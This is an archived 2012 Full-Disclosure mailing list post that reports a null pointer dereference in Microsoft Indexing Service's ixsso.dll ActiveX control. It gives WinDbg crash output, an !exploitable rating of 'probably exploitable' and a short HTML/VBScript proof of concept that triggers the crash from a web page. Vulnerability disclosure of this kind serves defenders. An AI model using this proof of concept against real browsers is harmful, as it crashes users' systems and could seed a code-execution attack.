lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Date: Fri, 24 Aug 2012 01:57:42 -0700
From: kaveh ghaemmaghami <kavehghaemmaghami@...glemail.com>
To: full-disclosure@...ts.grok.org.uk
Subject: Microsoft Indexing Service Server-side null
	pointer dereference

Exploit Title: Microsoft Indexing Service Server-side (ixsso.dll) null
pointer dereference
Crash : http://img836.imageshack.us/img836/7742/microsoftf.png
Date: 2012-08-24
Author: coolkaveh
coolkaveh@...ketmail.com
Https://twitter.com/coolkaveh
Vendor Homepage: http://http://www.microsoft.com/
Version: 5.1.2600.5512
Tested on: windows XP Sp3 ENG
Greets To Mohammad Morteza Sanaie
sanaie.morteza@...il.com
-----------------------------------------------------------------------------------------
Class CissoQuery
GUID: {A4463024-2B6F-11D0-BFBC-0020F8008024}
Number of Interfaces: 1
Default Interface: IixssoQuery
RegKey Safe for Script: True
RegkeySafe for Init: True
-----------------------------------------------------------------------------------------
Report for Clsid: {A4463024-2B6F-11D0-BFBC-0020F8008024}
RegKey Safe for Script: True
RegKey Safe for Init: True
Implements IObjectSafety: True
IDisp Safe:  Safe for untrusted: caller
-----------------------------------------------------------------------------------------
(c8c.85c): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000000 ebx=02e126d0 ecx=774fef18 edx=0020e5ea esi=0020e5c4 edi=00000000
eip=65da3d35 esp=02a4f070 ebp=02a4f098 iopl=0         nv up ei ng nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010286
*** ERROR: Symbol file could not be found.  Defaulted to export
symbols for C:\WINDOWS\system32\ixsso.dll -
ixsso!DllCanUnloadNow+0xeac:
65da3d35 8b08            mov     ecx,dword ptr [eax]  ds:0023:00000000=????????
Missing image name, possible paged-out or corrupt data.
0:012> !load winext\msec.dll
0:012> !exploitable -v
HostMachine\HostUser
Executing Processor Architecture is x86
Debuggee is in User Mode
Debuggee is a live user mode debugging session on the local machine
Event Type: Exception
*** ERROR: Symbol file could not be found.  Defaulted to export
symbols for C:\WINDOWS\system32\OLEAUT32.dll -
*** ERROR: Symbol file could not be found.  Defaulted to export
symbols for C:\WINDOWS\system32\mshtml.dll -
*** ERROR: Symbol file could not be found.  Defaulted to export
symbols for C:\WINDOWS\system32\vbscript.dll -
Exception Faulting Address: 0x0
First Chance Exception Type: STATUS_ACCESS_VIOLATION (0xC0000005)
Exception Sub-Type: Read Access Violation

Faulting Instruction:65da3d35 mov ecx,dword ptr [eax]

Basic Block:
65da3d35 mov ecx,dword ptr [eax]
Tainted Input Operands: eax
65da3d37 lea edx,[ebp+8]
65da3d3a push edx
65da3d3b push offset ixsso+0x1400 (65da1400)
65da3d40 push eax
Tainted Input Operands: eax
65da3d41 mov dword ptr [ebp+8],edi
65da3d44 mov dword ptr [ebp-0ch],edi
65da3d47 mov dword ptr [ebp-8],edi
65da3d4a mov dword ptr [ebp-4],edi
65da3d4d call dword ptr [ecx]
Tainted Input Operands: ecx, StackContents

Exception Hash (Major/Minor): 0x3716130a.0x43133e77

Stack Trace:
ixsso!DllCanUnloadNow+0xeac
OLEAUT32!DispCallFunc+0xc3
OLEAUT32!DispCallFunc+0x6d2
OLEAUT32!DispInvoke+0x23
ixsso!DllCanUnloadNow+0x391
mshtml!com_ms_osp_ospmrshl_releaseByValExternal+0xc86d3
mshtml!com_ms_osp_ospmrshl_releaseByValExternal+0xc8ce9
mshtml!com_ms_osp_ospmrshl_releaseByValExternal+0xc8736
vbscript!DllGetClassObject+0x12b6d
vbscript!DllGetClassObject+0x12ae0
vbscript!DllGetClassObject+0x12a81
vbscript+0x3da8
vbscript+0x40bf
vbscript+0x6412
vbscript+0x6397
vbscript+0x6bed
vbscript+0x6de5
vbscript!DllCanUnloadNow+0x15b6
vbscript+0xa306
mshtml+0xa195b
mshtml+0xa1804
mshtml+0xa18f0
mshtml+0xa06f5
Instruction Address: 0x0000000065da3d35

Description: Data from Faulting Address controls Code Flow
Short Description: TaintedDataControlsCodeFlow
Exploitability Classification: PROBABLY_EXPLOITABLE
Recommended Bug Title: Probably Exploitable - Data from Faulting
Address controls Code Flow starting at
ixsso!DllCanUnloadNow+0x0000000000000eac (Hash=0x3716130a.0x43133e77)

The data from the faulting address is later used as the target for a branch.
--------------------------------------------------------------------------------------------------------------------------------------------------------
<html>
Exploit
<object classid='clsid:A4463024-2B6F-11D0-BFBC-0020F8008024'
id='target' /></object>
<script language='vbscript'>
targetFile = "C:\WINDOWS\system32\ixsso.dll"
prototype  = "Property Let OnStartPage As object"
memberName = "OnStartPage"
progid     = "Cisso.CissoQuery"
argCount   = 1

Set arg1=Nothing

target.OnStartPage arg1
</script>

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists